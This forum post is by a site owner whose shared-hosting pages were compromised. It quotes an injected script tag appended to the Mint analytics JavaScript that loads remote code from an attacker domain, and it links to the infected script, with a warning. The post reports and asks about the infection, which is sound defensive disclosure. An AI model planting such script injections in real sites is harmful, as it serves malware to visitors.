First off, let me just say I know this has nothing to do with Mint. I’ve had it running on my site for some time now without incident. Also, I don’t wish to presume that a matter such as this would be categorized as a legitimate support issue. If that is indeed the case, I understand and apologize.
I just wanted to give a heads up to any other users out there who were unfortunate enough to chose Godaddy as their hosting service. If you don’t already know, last month Godaddy were hit by multiple attacks. You can read about them below. http://blog.sucuri.net/2010/05/here-we- … inues.html
My PHP based forum was hit and had to be completely purged. Thankfully, since my coding skills are horribly archaic, my HTML remained unscathed, or so I thought. Today one of my readers informed me that his A/V software flagged one of my HTML based pages. He provided me with the following link: PLEASE DON’T CLICK THIS ON A WINDOWS BASED MACHINE!!! http://crowsxworst.com/mint/?js
Upon closer inspection I noticed the following line of code at the end of the page: };Mint.save…script src=”http://holasionweb.com/oo.php”
Holasion.com were the ones responsible for these previously mentioned attacks. My question is, how the hell is this even possible?! It must have been inserted somewhere into the Mint directory, right? I reviewed a sample of my site’s pages after the attack to be certain it hadn’t been affected, but I never saw anything out of the ordinary. That mint java script looks completely banal on the surface. Or is it? To be honest, it’s been so long since I installed Mint, I don’t remember the exact snippet.
If there’s a way to quickly delete this without having to remove the mint js from every page, I’d love to know. If nothing else, maybe someone could tell me if that page I provided above is normal except for the final line with the attackers website?
Thank you for your time.